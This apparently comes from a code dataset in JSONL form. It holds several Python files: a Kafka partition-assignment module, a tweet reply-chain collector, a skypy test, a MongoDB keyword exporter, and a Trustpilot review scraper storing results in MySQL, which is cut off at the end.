"line_number": 389, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 394, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 394, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 395, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 396, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 399, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 399, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 400, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 401, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 401, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 401, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 401, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 401, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 407, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.savez", "line_number": 424, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.savez", "line_number": 432, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 437, "usage_type": "call"}]} +{"seq_id": "629578337", "text": "import logging\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nimport ujson\n\nlogger = logging.getLogger(__name__)\n\n#: A mapping of topics to assigned partitions.\n#: This type is used to maintain a map of assignments for a particular member. It is\n#: constructed soley of built-in types to ease serialization/deserialization.\nTopicAssignment = Dict[str, List[int]]\n\n#: A mapping of topics to their partition count.\nTopics = Dict[str, int]\n\n#: The identifier used to assign `TopicAssignments` to a member of the consumer group.\nMemberId = int\n\n\nclass MemberAssignment:\n @staticmethod\n def fromPrimitive(pRep) -> Optional['MemberAssignment']:\n \"\"\"\n Converts the primitive representation as produced by `toPrimitive()`\n back into a MemberAssignment.\n\n returns (MemberAssignment): None returned if the input does not conform\n \"\"\"\n\n valid = True\n valid = (\n pRep is not None\n and 'memberId' in pRep\n and 'topics' in pRep\n and isinstance(pRep['topics'], dict)\n and isinstance(pRep['memberId'], int)\n )\n\n if valid:\n for t, pList in pRep['topics'].items():\n if not valid:\n break\n\n if not isinstance(pList, list):\n valid = False\n else:\n for p in pList:\n if not isinstance(p, int):\n valid = False\n break\n\n if valid:\n return MemberAssignment(int(pRep['memberId']), pRep['topics'])\n else:\n logger.warning('Failed to convert primitive member assignment to MemberAssignment. prim: %s', pRep)\n return None\n\n def __init__(self, memberId: MemberId, topics: Optional[TopicAssignment] = None):\n \"\"\"Manages the assignments for a specific member of the assignment group.\n\n Instances of this class are used to manage the topic-partition assignments for a\n specific member identified by a `MemberId`.\n\n When using this class one can iterate over the assignments in a predetermined order\n that should stay consistent regardless of what order the assignments were assigned.\n\n Support for serialization and deserialization is provided by the class method `MemberAssignment.fromPrimitive()`\n and the instance method `toPrimitive()` which can be used with tools for working with different serialization formats\n (json and yaml for instance).\n\n Attributes:\n memberId (MemberId): The member these assignments are for.\n topics (TopicAssignment): The actual topic-partition assignments.\n \"\"\"\n\n self.memberId = memberId\n self.topics: TopicAssignment = topics if topics is not None else dict()\n\n def __str__(self):\n return f'memberId: {self.memberId}, topics: {self.topics}'\n\n def __repr__(self):\n return self.__str__()\n\n def __iter__(self):\n index = sorted(self.topics.keys())\n for t in index:\n pIndex = sorted(self.topics[t])\n for p in pIndex:\n yield (t, p)\n\n def toPrimitive(self) -> Dict[str, Any]:\n \"\"\"A representation consisting only of built-in types.\n\n Return a representation consisting of only built in types.\n This is useful for JSON serdes.\n \"\"\"\n return {'memberId': self.memberId, 'topics': self.topics}\n\n def totalAssignments(self):\n \"\"\"The total number of partition assignments currently assigned to this member.\"\"\"\n return sum([len(p) for t, p in self.topics.items()])\n\n def assign(self, topic: str, partition: int):\n \"\"\"Assigns the topic and partition number to this member.\n\n Assigns the topic-partition combination to this member. It does not validate\n the correctness of the assignment such as verifying the topic or partition number exists.\n\n Args:\n topic (str): Name of the topic to be assigned\n partition (int): The topic partition number to be assigned\n \"\"\"\n if topic not in self.topics:\n self.topics[topic] = []\n\n if partition not in self.topics[topic]:\n self.topics[topic].append(partition)\n\n\nclass AssignmentVersion:\n def __init__(self, version: int, configVersion: int, group: str):\n \"\"\"A small token that represents the version of a group's `Assignments`.\n\n Indicates the version of the assignments associated to a static membership\n group.\n\n Attributes\n version (int): The version of the assignment, this is a monotonically incremementing integer that changes whenever the Assignments change.\n configVersion (int): This version prevents older process configurations from reverting newer ones. It should always increase over time.\n group (str): The name of the consumer group, allows assignments to be isolated based on group.\n \"\"\"\n\n self.version = version\n self.configVersion = configVersion\n self.group = group\n\n\nclass Assignments:\n @staticmethod\n def fromJson(jsonData: str) -> Optional['Assignments']:\n \"\"\"Deserializes the given JSON assuming it was generated by `asJson()`.\n\n Deserializes JSON as produced by the asJson() method into an Assignments object.\n\n Args:\n jsonData (str): The serialized Assignments JSON\n\n Returns:\n Assignment: The deserialized Assignment or None if the jsonData is invalid\n \"\"\"\n assignments = None\n try:\n parsed = ujson.loads(jsonData)\n topics = parsed['topics']\n maxMembers = int(parsed['maxMembers'])\n group = parsed['group']\n configVersion = int(parsed.get('configVersion', -1))\n version = int(parsed.get('version', -1))\n primitiveMemberAssignments = parsed['memberAssignments']\n\n memberAssignments = [\n ma\n for ma in [MemberAssignment.fromPrimitive(pma) for pma in primitiveMemberAssignments]\n if ma is not None\n ]\n\n if isinstance(topics, Dict):\n assignments = Assignments(\n group, maxMembers, topics, configVersion, version, memberAssignments, len(memberAssignments) < 1\n )\n except Exception:\n logger.exception(\"Failed to parse Assignments from JSON. json: '%s'\", jsonData)\n\n return assignments\n\n def __init__(\n self,\n group: str = 'NO_GROUP',\n maxMembers: int = 0,\n topics: Topics = {},\n configVersion: int = -1,\n version: int = -1,\n memberAssignments: List[MemberAssignment] = [],\n doReassign: bool = True,\n ):\n \"\"\"Represnets and manages all assignments for a group.\n\n This represents all calculated assignments for a group. It is statically generated and\n creates assignments for members from `MemberId` 0 to `maxMembers`. It does not assign\n any particular consumer instance to the assignments, that is left to another part of the\n program.\n\n Supports identifying upon criteria changes (maxMembers, topics) whether the assignment table\n will change and optionally recalculates all assignments according to the new values.\n\n Attributes:\n group (str): The group name these assignments belong to.\n maxMembers (int): The maximum number of members expected for this group.\n topics (Topics): A list of topics to assign across the members.\n configVersion (int): A version number that should always increase in value\n when changes occur due to release time changes. The unix epoch at the\n time of release will do. This allows us to identify older assignments from\n newer ones during deployment time.\n version (int): A monotonically increasing version number that changes with every update,\n including those triggered by release changes and those at runtime, such as partition\n count updates.\n memberAssignments (List[MemberAssignment]): All calculated member assignments with the\n list index also representing the `MemberId`.\n doReassign=True (bool): Whether to perform reassignment calculations at init or not.\n \"\"\"\n # all distributed topics and partition counts\n self.group = group\n self.topics = topics\n self.maxMembers = maxMembers\n self.version = version\n self.configVersion = configVersion\n\n if self.configVersion == -1:\n self._warning('configVersion', '-1')\n if self.version == -1:\n self._warning('version', '-1')\n if self.maxMembers == 0:\n self._warning('maxMembers', '0')\n\n # member id to assignments\n self.memberAssignments = memberAssignments\n if doReassign:\n self._reassign()\n\n def _warning(self, attr: str, val: str):\n logger.warning('''\n WARNING WARNING WARNING\n\n Assignments %s found to be `%s` this is an invalid and default value.\n Check your configuration!\n ''', attr, val)\n\n\n def __str__(self):\n return f'{{assignments: {self.memberAssignments}}}'\n\n def __repr__(self):\n return self.__str__()\n\n def _reassign(self):\n calculator = AssignmentCalculator(self.maxMembers, self.topics)\n self.memberAssignments = calculator.generateAssignments(self)\n\n def asJson(self) -> str:\n \"\"\"\n Serializes this object into JSON suitable for deserialization using\n the static method `fromJson()`.\n\n Returns:\n str: The JSON\n \"\"\"\n j: Dict[str, Any] = {}\n j['group'] = self.group\n j['topics'] = self.topics\n j['maxMembers'] = self.maxMembers\n j['version'] = self.version\n j['configVersion'] = self.configVersion\n j['memberAssignments'] = [ma.toPrimitive() for ma in self.memberAssignments]\n\n return ujson.dumps(j)\n\n def assignmentVersion(self) -> AssignmentVersion:\n \"\"\"Generate an `AssignmentVersion` token from this.\n\n The generated `AssignmentVersion` may contain many `None` values based on the current\n state of the assignment.\n\n Returns:\n AssignmentVersion: Generated version token for this.\n \"\"\"\n return AssignmentVersion(self.version, self.configVersion, self.group)\n\n def changeMaxMembers(self, maxMembers: int) -> bool:\n \"\"\"Update the maximum members belonging to this group's assignments\n\n Updates the maximum number of members that may belong to this group. If this\n update causes a change to the assignments then True will be returned.\n\n Args:\n maxMembers (int): The new maximum group size, must be greater than 0\n\n Returns :\n bool: True if the change triggered a recalculation of assignments\n \"\"\"\n return self._changeMaxMembers(maxMembers)\n\n def _changeMaxMembers(self, maxMembers: int, doReassign: bool = True) -> bool:\n if not maxMembers > 0:\n raise ValueError(\n f\"Invalid maxMembers argument, expected to be greater than 0, but received: '{maxMembers}''\"\n )\n\n changed = self.maxMembers != maxMembers\n if changed:\n self.maxMembers = maxMembers\n\n if doReassign:\n self._reassign()\n return changed\n\n def changeTopicPartitions(self, topics: Topics):\n \"\"\"Replace the topic-partitions that should be assigned.\n\n Updates the topic partitions that should be assigned across the members. If\n this change causes an assignment redistribution then True is returned.\n\n This is a complete replacement, all previous topic-partitions will be removed.\n\n Args:\n topics (Topics): Updated dictionary of topics with partition counts\n\n Returns:\n bool: True if a change in assignments occurred\n \"\"\"\n return self._changeTopicPartitions(topics)\n\n def _changeTopicPartitions(self, topics: Topics, doReassign: bool = True):\n changed = False\n for t, p in topics.items():\n if t not in self.topics or self.topics[t] != p:\n changed = True\n break\n\n if changed:\n self.topics = topics\n\n if doReassign:\n self._reassign()\n\n return changed\n\n def getMemberAssignment(self, memberId: MemberId) -> Optional[MemberAssignment]:\n \"\"\"Get assignments for a particular member.\n\n Fetches the assignments for the given member ID.\n\n Args:\n memberId (int): The member ID to find the assignments for\n\n Returns:\n MemberAssignment: The assignments for the member ID or None if the member ID is unknown or unassigned\n \"\"\"\n if len(self.memberAssignments) > memberId:\n return self.memberAssignments[memberId]\n else:\n return None\n\n\nclass AssignmentCalculator:\n def __init__(self, maxSize: int, topics: Topics):\n \"\"\"Calculates group assignments.\n\n Calculate group assigments based on the given criteria.\n\n Args:\n maxSize (int): The maximum number of assignments to calculate\n topics (Topics): A dictionary of topic names to partition counts that need assigning\n \"\"\"\n\n self.maxSize = maxSize\n self.topics = topics\n\n def _partitionsByIndex(self):\n \"\"\"\n This generator will return (topic, partition number) tuples in a well defined order that\n is breadth first. For example it will return all 0 partitions of each topic first, then all 1 partitions\n etc. until all topic partitions are doled out.\n \"\"\"\n\n topics = {}\n for t, p in self.topics.items():\n topics[t] = {'count': p, 'pos': 0}\n\n sortedTopics = sorted(topics.keys())\n\n while len(topics) != 0:\n for t in sortedTopics:\n if t in topics:\n if topics[t]['pos'] < topics[t]['count']:\n yield (t, topics[t]['pos'])\n topics[t]['pos'] += 1\n else:\n del topics[t]\n\n def _totalPartitions(self):\n return sum([p for t, p in self.topics.items()])\n\n def generateAssignments(self, prevAssignments: Assignments = None) -> List[MemberAssignment]:\n \"\"\"Generates all assignments.\n\n Generates a new list of assignments for all members based on the state of the calculator. Can take into\n consideration the max group size, topics to distribute and previous assignments.\n\n Args:\n prevAssignments (Assignments): Can be used to help determine efficient redistribution of assignments\n\n Returns:\n List[MemberAssignment]: The calculated list of all member assignments with the list index also being the `MemberId`.\n \"\"\"\n\n if self.maxSize is None or self.maxSize == 0 or self.topics is None or len(self.topics) == 0:\n return []\n\n tpSize = self._totalPartitions()\n tpIter = self._partitionsByIndex()\n members = [MemberAssignment(i) for i in range(self.maxSize)]\n\n if self.maxSize >= tpSize:\n perMbrPartitions = 1\n remainders = 0\n else:\n perMbrPartitions = int(tpSize / self.maxSize)\n remainders = tpSize % self.maxSize\n\n logger.info('perMbrCount: %s, remainders: %s', perMbrPartitions, remainders)\n for mbr in members:\n pCount = perMbrPartitions\n if remainders > 0:\n pCount += 1\n remainders -= 1\n\n assignCount = 0\n for t, p in tpIter:\n mbr.assign(t, p)\n assignCount += 1\n if assignCount >= pCount:\n break\n\n return members\n", "sub_path": "app/static_assignment/assignments.py", "file_name": "assignments.py", "file_ext": "py", "file_size_in_byte": 16135, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 95, "usage_type": "name"}, {"api_name": "ujson.loads", "line_number": 157, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 171, "usage_type": "argument"}, {"api_name": "typing.Optional", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 187, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 261, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 261, "usage_type": "name"}, {"api_name": "ujson.dumps", "line_number": 269, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 341, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 397, "usage_type": "name"}]} +{"seq_id": "424189605", "text": "import os.path\nimport re\nimport time\nfrom datetime import datetime\n\n# match tweet inside \"text\":\"\" which can contain escaped quotes\ntweet_re = re.compile('\"text\":\"((?:[^\"\\\\\\\\]*(?:\\\\\\\\.)?)*)\"')\ntweet_id_re = re.compile('\"id\":(\\d*)')\n# timestamp was not added until 2014, fall back to using 'created at' if not available\ntimestamp_re = re.compile('\"timestamp_ms\":\"(\\d*)\"')\ncreated_at_re = re.compile('\"created_at\":\"([^\"]*)\"')\n\nparent_id_re = re.compile('\"in_reply_to_status_id\":(\\d*),')\n\n# id, id of highest level parent\ntweet_parent = {}\n\nwith open(\"tweet_replies.txt\", 'w') as f_out:\n for m in range(1, 13):\n for d in range(1, 32):\n\n path = \"%02d/%02d.ru.json\" % (m, d)\n\n if os.path.isfile(path):\n print(\"File: %s\" % path)\n with open(path) as f:\n for line in f:\n text_match = tweet_re.search(line)\n if not text_match:\n print(\"No tweet text found in file %s's line %s!\" % (path, line))\n continue\n\n id_match = tweet_id_re.search(line)\n if not id_match:\n print(\"No tweet id found in file %s's line %s!\" % (path, line))\n continue\n \n timestamp_match = timestamp_re.search(line)\n if not timestamp_match:\n\n created_at_match = created_at_re.search(line)\n if not created_at_match:\n print(\"No time found in file %s's line %s!\" % (path, line))\n continue\n\n # convert to unix time with milliseconds\n tweet_timestamp = int(time.mktime(datetime.strptime(created_at_match.group(1), '%a %b %d %X +0000 %Y').timetuple()) * 1000)\n else:\n tweet_timestamp = int(timestamp_match.group(1))\n\n\n tweet_id = int(id_match.group(1))\n tweet_text = text_match.group(1).replace('\\\\n', ' ').replace('\\\\r', ' ').decode('unicode-escape')\n\n\n parent_match = parent_id_re.search(line)\n\n if parent_match:\n parent_id = int(parent_match.group(1))\n\n while True:\n # if the parent doesn't exists make a new chain\n if parent_id not in tweet_parent:\n tweet_parent[tweet_id] = 0\n parent_id = tweet_id\n break\n\n if tweet_parent[parent_id] == 0:\n break\n\n parent_id = tweet_parent[parent_id]\n\n else:\n tweet_parent[tweet_id] = 0\n parent_id = tweet_id\n\n f_out.write(str(tweet_timestamp))\n f_out.write(' ')\n f_out.write(str(parent_id))\n f_out.write(' ')\n f_out.write(tweet_text.encode('utf-8'))\n f_out.write('\\n')\n", "sub_path": "collect_reply_chains.py", "file_name": "collect_reply_chains.py", "file_ext": "py", "file_size_in_byte": 3362, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 7, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 8, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 10, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 11, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 24, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "31202637", "text": "from astropy.utils.data import get_pkg_data_filename\nfrom contextlib import redirect_stdout\nfrom io import StringIO\nimport pytest\nfrom skypy import __version__ as skypy_version\nfrom skypy.pipeline.scripts import skypy\n\n\ndef test_skypy():\n\n # No arguments\n with pytest.raises(SystemExit) as e:\n skypy.main([])\n assert e.value.code == 0\n\n # Argparse help\n with pytest.raises(SystemExit) as e:\n skypy.main(['--help'])\n assert e.value.code == 0\n\n # Argparse version\n version = StringIO()\n with pytest.raises(SystemExit) as e:\n with redirect_stdout(version):\n skypy.main(['--version'])\n assert version.getvalue().strip() == skypy_version\n assert e.value.code == 0\n\n # Missing positional argument 'config'\n with pytest.raises(SystemExit) as e:\n skypy.main(['--format', 'fits'])\n assert e.value.code == 2\n\n # Invalid file format\n with pytest.raises(SystemExit) as e:\n skypy.main(['--format', 'invalid', 'config.filename'])\n assert e.value.code == 2\n\n # Process empty config file\n filename = get_pkg_data_filename('data/empty_config.yml')\n assert skypy.main([filename]) == 0\n\n # Process test config file\n filename = get_pkg_data_filename('data/test_config.yml')\n assert skypy.main([filename]) == 0\n\n # Process lightcone config file\n filename = get_pkg_data_filename('data/lightcone_config.yml')\n assert skypy.main([filename]) == 0\n", "sub_path": "skypy/pipeline/tests/test_skypy.py", "file_name": "test_skypy.py", "file_ext": "py", "file_size_in_byte": 1447, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.raises", "line_number": 12, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 13, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 13, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 17, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 18, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 18, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 23, "usage_type": "call"}, {"api_name": "contextlib.redirect_stdout", "line_number": 24, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 25, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 25, "usage_type": "name"}, {"api_name": "skypy.__version__", "line_number": 26, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 30, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 31, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 31, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 35, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 36, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 36, "usage_type": "name"}, {"api_name": "astropy.utils.data.get_pkg_data_filename", "line_number": 40, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 41, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 41, "usage_type": "name"}, {"api_name": "astropy.utils.data.get_pkg_data_filename", "line_number": 44, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 45, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 45, "usage_type": "name"}, {"api_name": "astropy.utils.data.get_pkg_data_filename", "line_number": 48, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 49, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "292794770", "text": "#coding:utf-8\r\n\"\"\"\r\n将一个数据库里的所有表中的关键字导入到一个txt文件中,以便爬虫爬取\r\n\"\"\"\r\nimport pymongo\r\n\r\nclass dbToTxt(object):\r\n def __init__(self,db_name='monstercralwer'):\r\n conn = pymongo.MongoClient('127.0.0.1', 27017)\r\n self.db = conn[db_name]\r\n\r\n def key_to_txt(self):\r\n\r\n collection_names=self.db.collection_names()\r\n for name in collection_names:\r\n if 'keys' in name.split('_'):\r\n cursor = self.db[name].find()\r\n for content in cursor:\r\n with open('seen_keywords.txt','a+') as f:\r\n f.write(content['keyword']+'\\n')\r\n\r\ndbtotxt = dbToTxt()\r\ndbtotxt.key_to_txt()\r\n\r\n\r\n\r\n\r\n", "sub_path": "spider_avira/db_to_txt.py", "file_name": "db_to_txt.py", "file_ext": "py", "file_size_in_byte": 731, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "442200015", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport argparse\nimport pymysql.cursors\nimport json\nfrom config import conf\n\n\ndef check_status():\n \"\"\"Checks status of webpage\"\"\"\n r = requests.get('https://www.trustpilot.com')\n print(r.status_code)\n print(r.status_code == requests.codes.ok)\n print(requests.codes['temporary_redirect'])\n print(requests.codes.teapot)\n print(requests.codes['o/'])\n\n\ndef scrap(company, num_pages):\n \"\"\"Scrap a company's reviews from their TrustPilot page.\"\"\"\n names = []\n ratings = []\n titles = []\n contents = []\n rev_wrote = []\n replies = []\n company_names = []\n num_reviews = []\n company_ratings = []\n website = []\n urls = []\n symbols = []\n\n headers = requests.utils.default_headers()\n headers.update({\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',\n })\n\n for p in range(1, int(num_pages)):\n page_url = requests.get('https://www.trustpilot.com/review/' + company + '?page=' + str(p), headers=headers)\n soup = BeautifulSoup(page_url.content, 'html.parser')\n review_card = soup.find_all('div', class_='review-card')\n # find website of the company\n # I do it just one time\n # TODO LOOK AT THIS we need to put\n if p == 1:\n web_tag = soup.find_all('a', class_=\"badge-card__section badge-card__section--hoverable company_website\")\n for a in web_tag:\n website.append(a['href'])\n company_name = soup.find('span', class_='multi-size-header__big').get_text(strip=True)\n company_names.append(company_name)\n num_review = soup.find('h2', class_='header--inline').get_text(strip=True)\n num_review = ''.join(filter(str.isdigit, num_review))\n num_reviews.append(num_review)\n company_rating = soup.find('p', class_='header_trustscore').get_text()\n company_ratings.append(company_rating)\n symbol = yahoo_finance(company_name)\n symbols.append(symbol)\n # get url for each user\n user_url = soup.find_all('a', href=True)\n for a in user_url:\n user_id = a['href']\n if '/users/5' in user_id and user_id not in urls:\n urls.append(user_id)\n for review in review_card:\n # Username\n name = review.find('div', class_='consumer-information__name').get_text(strip=True)\n names.append(name)\n # Rating\n rating = review.find('img').attrs.get('alt')\n ratings.append(rating)\n # Review title\n title = review.find('a', class_='link link--large link--dark').get_text(strip=True)\n titles.append(title)\n # Review content\n if review.find('p', class_='review-content__text'):\n content = review.find('p', class_='review-content__text').get_text(strip=True)\n else:\n content = None\n contents.append(content)\n # Number of reviews wrote by user\n rev_written = review.span.get_text()\n rev_wrote.append(rev_written)\n # Replied received\n reply = review.find('div', class_='review__company-reply')\n if reply:\n replies.append(1)\n else:\n replies.append(0)\n # country and parse another page\n countries = parse_another_page(urls)\n reviews_dict = {'ratings': ratings,\n 'titles': titles,\n 'contents': contents,\n 'replies': replies\n }\n users_dict = {'names': names,\n 'countries': countries,\n 'rev_wrote': rev_wrote\n }\n companies_dict = {'company_names': company_names,\n 'company_ratings': company_ratings,\n 'website': website,\n 'num_reviews': num_reviews,\n 'symbols': symbols\n }\n return reviews_dict, users_dict, companies_dict\n\n\ndef parse_another_page(urls):\n lst = []\n for url in urls:\n page_url = requests.get('https://www.trustpilot.com/' + url)\n soup = BeautifulSoup(page_url.content, 'html.parser')\n countries = soup.find('div', class_='user-summary-location')\n if countries is not None:\n lst.append(countries.text.strip().strip('\\n'))\n return lst\n\n\ndef export_csv(company, num_pages):\n \"\"\"Stores results to pandas df and creates a csv file.\"\"\"\n reviews_dict, users_dict, companies_dict = scrap(company, num_pages)\n reviews_df = pd.DataFrame(reviews_dict)\n users_df = pd.DataFrame(users_dict)\n companies_df = pd.DataFrame(companies_dict)\n reviews_df.to_csv('reviews.csv')\n users_df.to_csv('users.csv')\n companies_df.to_csv('companies.csv')\n\n\ndef export_sql(company, num_pages):\n \"\"\"Stores results to pandas df and creates a csv file.\"\"\"\n reviews_dict, users_dict, companies_dict = scrap(company, num_pages)\n try:\n connection = pymysql.connect(host='localhost',\n user=conf.user,\n password=conf.password,\n database='trustpilot',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n print(f'Database exists. Succesfully connected')\n c = connection.cursor()\n except:\n connection = pymysql.connect(host='localhost',\n user=conf.user,\n password=conf.password,\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n c = connection.cursor()\n c.execute('CREATE DATABASE trustpilot')\n c.execute('USE trustpilot')\n users_table = \"\"\" CREATE TABLE Users (\n user_id int NOT NULL UNIQUE AUTO_INCREMENT,\n user_name varchar(255),\n country varchar(255),\n rev_wrote int,\n PRIMARY KEY (user_id));\n \"\"\"\n companies_table = \"\"\"\n CREATE TABLE Companies (\n company_id int NOT NULL UNIQUE AUTO_INCREMENT,\n company_names varchar(255),\n company_ratings varchar(255),\n website varchar(255),\n num_reviews int,\n symbols varchar(255),\n PRIMARY KEY (company_id)\n );\n \"\"\"\n reviews_table = \"\"\"\n CREATE TABLE Reviews (\n review_id int NOT NULL UNIQUE AUTO_INCREMENT,\n rating int,\n title varchar(255),\n content varchar(255),\n replies int,\n user_id int,\n company_id int,\n PRIMARY KEY (review_id),\n FOREIGN KEY (user_id) REFERENCES Users (user_id),\n FOREIGN KEY (company_id) REFERENCES Companies (company_id)\n );\n \"\"\"\n # with connection.cursor() as cursor:\n c.execute(users_table)\n c.execute(companies_table)\n c.execute(reviews_table)\n c.execute(\"SET GLOBAL sql_mode='';\")\n companies_insert_query = 'INSERT INTO Companies(company_names,company_ratings,website,num_reviews) VALUES (%s,%s,%s,%s) '\n c.execute(companies_insert_query, (companies_dict['company_names'][0], companies_dict['company_ratings'][0],\n companies_dict['website'][0], companies_dict['num_reviews'][0]))\n company_id = c.lastrowid\n for i in range(len(reviews_dict['ratings']) - 1):\n # print(reviews_dict['ratings'][i])\n users_insert_query = 'INSERT INTO Users(user_name,country,rev_wrote) VALUES (%s,%s,%s)'\n c.execute(users_insert_query,\n (users_dict['names'][i], users_dict['countries'][i], users_dict['rev_wrote'][i]))\n # get user id foreign key\n user_id = c.lastrowid\n reviews_insert_query = 'INSERT INTO Reviews(rating,title,content,replies, user_id, company_id) VALUES (%s,%s,%s,%s,%s,%s)'\n c.execute(reviews_insert_query,\n (reviews_dict['ratings'][i], reviews_dict['titles'][i], reviews_dict['contents'][i],\n reviews_dict['replies'][i], user_id, company_id))\n # c.commit()\n # insert foreign key company\n c.close()\n connection.commit()\n\n\ndef yahoo_finance(company_name):\n \"\"\"Gets the company's stock symbol if it is publicly traded\"\"\"\n url = \"https://apidojo-yahoo-finance-v1.p.rapidapi.com/auto-complete\"\n querystring = {\"q\": company_name, \"region\": \"US\"}\n headers = {\n 'x-rapidapi-key': conf.api_key,\n 'x-rapidapi-host': \"apidojo-yahoo-finance-v1.p.rapidapi.com\"\n }\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n resp_str = response.text\n resp_dict = json.loads(resp_str)\n try:\n quote = resp_dict['quotes'][0]\n symbol = quote['symbol']\n except IndexError:\n symbol = ''\n return symbol\n\n\ndef main():\n \"\"\"Runs commands above\"\"\"\n # CLI\n parser = argparse.ArgumentParser()\n parser.add_argument('company', help='company_name')\n parser.add_argument('num_pages', help='page limit')\n args = parser.parse_args()\n company = args.company\n num_pages = args.num_pages\n print('Scrapping data from ' + company)\n # export_csv(company, num_pages)\n export_sql(company, num_pages)\n\n\nif 